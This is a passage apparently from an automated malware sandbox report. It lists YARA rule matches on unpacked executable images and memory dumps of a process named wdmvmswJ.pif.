Source: Yara match File source: 12.3.wdmvmswJ.pif.1e700000.850.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.3.wdmvmswJ.pif.1e7a0000.903.unpack, type: UNPACKEDPE
Source: Yara match File source: 30.2.wdmvmswJ.pif.279e6478.12.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.3.wdmvmswJ.pif.1e8e0cd8.17.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.3.wdmvmswJ.pif.1e700000.847.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.3.wdmvmswJ.pif.1e700000.920.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.3.wdmvmswJ.pif.1e790000.1063.unpack, type: UNPACKEDPE
Source: Yara match File source: 30.2.wdmvmswJ.pif.279e5570.11.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.3.wdmvmswJ.pif.1e6f0000.916.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.3.wdmvmswJ.pif.1e740000.1158.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.3.wdmvmswJ.pif.1e6f0000.844.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.3.wdmvmswJ.pif.1e8e0cd8.17.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.3.wdmvmswJ.pif.1e7a0000.866.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.3.wdmvmswJ.pif.1e7a0000.1059.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.3.wdmvmswJ.pif.1e770000.1051.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000026.00000002.1848536058.000000001FD45000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001E.00000003.1663470654.00000000244EA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001E.00000002.1777354937.000000002657E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000026.00000002.1848938336.00000000213F0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001E.00000002.1798010411.0000000029240000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000026.00000002.1840076965.000000001E8BE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000003.1553023677.000000001E8E0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001E.00000002.1795060712.00000000279E5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000026.00000002.1840971745.000000001EB40000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001E.00000002.1782173123.00000000268B0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000026.00000003.1766990632.000000001C684000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000026.00000002.1842028459.000000001EDB7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000026.00000002.1842028459.000000001ED41000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001E.00000002.1782690545.0000000026A57000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: wdmvmswJ.pif PID: 2056, type: MEMORYSTR